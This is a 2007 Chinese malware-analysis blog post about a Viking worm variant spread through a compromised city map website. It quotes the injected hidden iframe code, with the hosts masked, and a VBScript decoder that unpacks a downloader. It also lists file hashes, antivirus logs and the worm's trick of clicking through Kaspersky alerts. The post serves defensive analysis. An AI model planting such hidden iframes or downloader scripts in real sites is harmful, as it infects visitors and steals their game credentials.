某城市地图网站被挂上威金/Viking新变种Worm.Win32.Viking.ii
来源:互联网 发布:中国大气污染数据 编辑:程序博客网 时间:2024/04/27 17:04
endurer 原创
2007-03-05 第1版
打开该城市地图网站的网页,瑞星警告发现:Hack.Exploit.Vml.g。
检查网页,发现网页所引用的 images/ad.js 包含代码:
/---
document.writeln("<iframe src=/"hxxp:////m***m**.k****is*163.com//index.html?id=5 /" width=0 height=0><//iframe>");
---/
hxxp://m***m**.k****is*163.com/index.html?id=5 包含代码:
/---
<iframe src="hxxp://web***.7***72*7***6.com/*0****.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://web***.7***72*7***6.com/*0****.htm 的标题为http NO FOUND,内容为VBScript脚本代码,功能是调用自定义函数:
/----
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
----/
对变量t的值进行解密并调用execute()执行。
解密后的代码是VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:33:14
修改时间 : 2007-3-5 12:33:14
访问时间 : 2007-3-5 12:34:20
大小 : 93240 字节 91.56 KB
MD5 : ef70c5791d050cc898319acbb044e847
Kaspersky 报为 Worm.Win32.Viking.ii
0.exe运行后会下载其它恶意文件并感染EXE文件。
下面是0.exe运行后Kaspersky 6的记录:
/----
已检测到: 风险软件 Trojan.generic 运行进程: D:/test/0.exe
已检测到: 木马程序 Trojan-PSW.Win32.Magania.jm 文件: C:/WINNT/system32/wincab.sys
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/WINNT/SMSS.EXE
已检测到: 风险软件 Invader 运行进程: C:/WINNT/SVCHOST.EXE
已检测到: 风险软件 Invader (loader) 运行进程: C:/WINNT/explorer.exe
已检测到: 木马程序 Backdoor.Win32.Agent.alh 文件: C:/WINNT/system32/systemt.exe/UPack
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.gs 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/smsss[1].exe
已检测到: 木马程序 Trojan.Win32.Agent.abf 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/276BATUZ/lsasss[1].exe/PE_Patch/UPack
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/CX67WL2N/avg[1].exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/WINNT/CSRSS.exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/MUT33WP4/datsc[1].exe
已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:/WINNT/10Sy.exe
已检测到: 木马程序 Trojan-PSW.Win32.WOW.ec 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/O56R812F/adobesvc[1].exe
已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/E1ITG5SV/svchots[1].exe
已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/mstcs[1].exe
----/
值得注意的是,病毒会搜索标题为AVP.AlertDialog的 Kaspersky 的警告窗口,模拟点击按钮“允许”和“跳过”
向 Kaspersky 的通知窗口(类名为:AVP.Product_Notification)发送WM_CLOSE消息结束该窗口。
所以用户无法进行操作。
用pe_xscan扫描,发现可疑项:
/---
pe_xscan by Purple Endurer
2007-3-5 12:44:24
Windows 2000 Service Pack 4(5.0.2195)
管理员用户组
[System Process] * 0
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/Explorer.EXE * 928 | 2003-6-20 3:5:4 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.3700.6690 | Windows Explorer | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.3700.6690 | Microsoft Corporation| ? | explorer | EXPLORER.EXE
C:/WINNT/RichDll.dll | 2007-3-5 12:37:41
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/internat.exe * 1176 | 2000-1-10 20:0:0 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2920.0000 | Keyboard Language Indicator Applet | Copyright (C) Microsoft Corp. 1994-1999 | 5.00.2920.0000 | Microsoft Corporation| ? | INTERNAT | INTERNAT.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/Tencent/qq/QQ.exe * 516 | 2006-3-2 8:52:30 | TENCENT QQ | 0, 0, 0, 0 | QQ | Copyright ? 2005 | 0, 0, 0, 0 | TENCENT | | COMQQD | QQ.exe
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/Maxthon/Maxthon.exe * 904 | 2007-2-11 17:46:2 | Maxthon Application | 1, 5, 9, 80 | Maxthon Web Browser | Copyright (C) 2002 | 1, 5, 9, 80 | Maxthon International Ltd. | Maxthon | Maxthon | Maxthon.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/Program Files/EditPlus 2/editplus.exe * 588 | 2005-12-12 9:32:12 | EditPlus | 2, 2, 1, 330 | EditPlus | Copyright ? 1998-2005 ES-Computing | 2, 2, 1, 330 | ES-Computing | EditPlus | EditPlus | EDITPLUS.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/notepad.exe * 508 | 2000-1-10 20:0:0 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2140.1 | 记事本 | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.2140.1 | Microsoft Corporation| ? | Notepad | NOTEPAD.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
C:/WINNT/system32/conime.exe * 1476 | 2003-6-20 3:5:4 | Microsoft(R) Windows (R) 2000 Operating System | 5.00.2195.6655 | Console IME | Copyright (C) Microsoft Corp. 1981-1999 | 5.00.2195.6655 | Microsoft Corporation| ? | Console | CONIME.EXE
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
D:/pe/tools/3.exe * 1508 | 2007-3-5 12:43:37
C:/WINNT/system32/wsttrs.dll | 2007-3-5 12:37:47
O4 - HKLM/../Run: [wsttrs] C:/WINNT/SVCHOST.EXE
O23 - 服务: shiji (shiji) - C:/WINNT/system32/wincab.sys(手动启动)
---/
文件说明符 : C:/WINNT/system32/wsttrs.dll
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:47
修改时间 : 2007-3-5 12:37:47
访问时间 : 2007-3-5 13:35:18
大小 : 23539 字节 22.1011 KB
MD5 : 6e25ea101a59463623725d6073058dc1
Kaspersky 报为: Trojan-PSW.Win32.Magania.jm.1
瑞星 报为:Trojan.PSW.WLOnline.jcv
文件说明符 : C:/WINNT/RichDll.dll
属性 : ----
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:41
修改时间 : 2007-3-5 12:37:41
访问时间 : 2007-3-5 13:38:25
大小 : 29721 字节 29.25 KB
MD5 : a936b1dba52bbbc79cf23f9d965d2646
Kaspersky 报为: Worm.Win32.Viking.ii
文件说明符 : C:/WINNT/SVCHOST.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:46
修改时间 : 2007-3-5 12:37:46
访问时间 : 2007-3-5 13:39:4
大小 : 69859 字节 68.227 KB
MD5 : 2424f02a0ea72ffeae27f8b33fb5dfc9
Kaspersky 报为:Trojan-PSW.Win32.Magania.jm.1
瑞星 报为:Trojan.PSW.Roc.ad
文件说明符 : c:/WINNT/10Sy.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:15
修改时间 : 2007-3-5 13:47:44
访问时间 : 2007-3-5 13:49:17
大小 : 25072 字节 24.496 KB
MD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky 报为:Trojan-Downloader.Win32.Small.czl
瑞星 报为:Trojan.PSW.LMir.mdw
文件说明符 : C:/WINNT/system32/systemt.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:56
修改时间 : 2007-3-5 12:59:27
访问时间 : 2007-3-5 13:0:32
大小 : 26130 字节 25.530 KB
MD5 : 8ae1afdb6a25569a5d55a4eb5389121c
Kaspersky报为: Backdoor.Win32.Agent.alh
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temp/q9xtwt5.dll
属性 : ASH-
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:46
修改时间 : 2007-3-5 12:37:46
访问时间 : 2007-3-5 11:6:31
大小 : 32483 字节 31.739 KB
MD5 : b19d0273f347ed7e3dc4fb95a70f48a4
Kaspersky报为:Trojan-PSW.Win32.Magania.jm.1
瑞星报为:RootKit.Vanti.vr
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/web[1].DLL
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:59:1
修改时间 : 2007-3-5 12:59:1
访问时间 : 2007-3-5 13:27:43
大小 : 17227 字节 16.843 KB
MD5 : c68f384f846fc5943e8470ff37d9111d
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/ATKZUDI5/smsss[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:57
修改时间 : 2007-3-5 12:37:59
访问时间 : 2007-3-5 13:25:55
大小 : 13824 字节 13.512 KB
MD5 : 3f864049a2fde64042a82565d4ff92af
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.gs
瑞星报为:Trojan.PSW.ZhengTu.anc
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/276BATUZ/lsasss[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:0
修改时间 : 2007-3-5 12:38:1
访问时间 : 2007-3-5 13:23:29
大小 : 40968 字节 40.8 KB
MD5 : 23f203134804fa6f2d31667267595dc5
Kaspersky 报为:Trojan.Win32.Agent.abf
瑞星报为::Trojan.Agent.fii
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/CX67WL2N/avg[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:43
修改时间 : 2007-3-5 12:38:6
访问时间 : 2007-3-5 13:21:48
大小 : 13824 字节 13.512 KB
MD5 : 3cec40cb6a2ba1e57c91a083c10b09e4
此文件会复制为:c:/WINNT/SMSS.EXE
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.es
瑞星 报为:Trojan.PSW.OnlineGames.in
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/MUT33WP4/datsc[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:10
修改时间 : 2007-3-5 12:38:10
访问时间 : 2007-3-5 13:17:19
大小 : 13824 字节 13.512 KB
MD5 : a9b8b545f24b36e52fd0176db42becdd
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es
瑞星报为::Trojan.PSW.Agent.jdm
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/O56R812F/adobesvc[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:25
修改时间 : 2007-3-5 13:38:28
访问时间 : 2007-3-5 13:15:18
大小 : 226868 字节 221.564 KB
MD5 : 54ce2ffabb6ddefd26d5360d427870c2
Kaspersky报为:Trojan-PSW.Win32.WOW.ec
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/E1ITG5SV/svchots[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:6
修改时间 : 2007-3-5 12:38:32
访问时间 : 2007-3-5 13:13:13
大小 : 14848 字节 14.512 KB
MD5 : a4742619bf2f16aed92fdc8623ad0623
此文件被复制为:c:/WINNT/CSRSS.exe
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/inetinf[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:37:49
修改时间 : 2007-3-5 12:37:55
访问时间 : 2007-3-5 13:11:9
大小 : 279652 字节 273.100 KB
MD5 : 10a390602afad9926028116607ac094a
此文件被复制为c:/WINNT/SERVICES.EXE
Kaspersky 报为:Backdoor.Win32.Agent.alh
文件说明符 : c:/Documents and Settings/pe/Local Settings/Temporary Internet Files/Content.IE5/9ULFUMAW/mstcs[1].exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-5 12:38:14
修改时间 : 2007-3-5 13:9:58
访问时间 : 2007-3-5 13:10:36
大小 : 25072 字节 24.496 KB
MD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky报为:Trojan-Downloader.Win32.Small.czl
瑞星报为:Trojan.PSW.LMir.mdw
- 某城市地图网站被挂上威金/Viking新变种Worm.Win32.Viking.ii
- 发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
- 某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
- 刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
- 小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
- 小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv等
- 遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等1
- 遭遇Worm.Win32.Viking.lm/Worm.Viking.tc,Trojan.PSW.Win32.OnlineGames等2
- 初遇Worm.Viking.dy
- 某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
- 遭遇Worm.Win32.Viking,Worm.Win32f.ysv,Trojan.PSW.Win32.OnlineGames等
- 剿灭“隐形刺客”——Desktop.ini维金(Worm.Viking.m)病毒的变种
- 昨天才提醒,今天就有网友点击QQ信息中的网址,中Worm.Viking.pk/Worm.Win32.Viking.jg了
- 03-19/一个传播 Worm.Win32.Viking.jg的 网页,解密有点难度(第2版)
- 遭遇Viking/威金新变种、Trojan-PSW.Win32.WOW.do等(一)
- 遭遇Viking/威金新变种、Trojan-PSW.Win32.WOW.do等(二)
- 遭遇Viking/威金新变种、Trojan-PSW.Win32.WOW.do等(三)
- 遭遇Viking新变种、传奇、魔兽盗号木马等(第3版)
- Struts标签报错:The end tag is unbalanced
- 特别是服务和驱动程序...按照这个日志错误来分析
- 详解linux下的串口通讯开发[转载]
- Ajax程序设计入门
- XML傳送與接收
- 某城市地图网站被挂上威金/Viking新变种Worm.Win32.Viking.ii
- asp插入图片的一种模式
- 如何让弹出的菜单不被OBJECT覆盖
- 正则表达式,必填1,2位小数的expression
- SOA新手入门
- ZT:对象生死劫 - 构造函数和析构函数的异常
- JSP和JSF合并 共同打造完美的Web应用
- Hibernate报错:XXX for this class must be manually assigned before calling save():
- win2003 下IIS配置PHP+mysql环境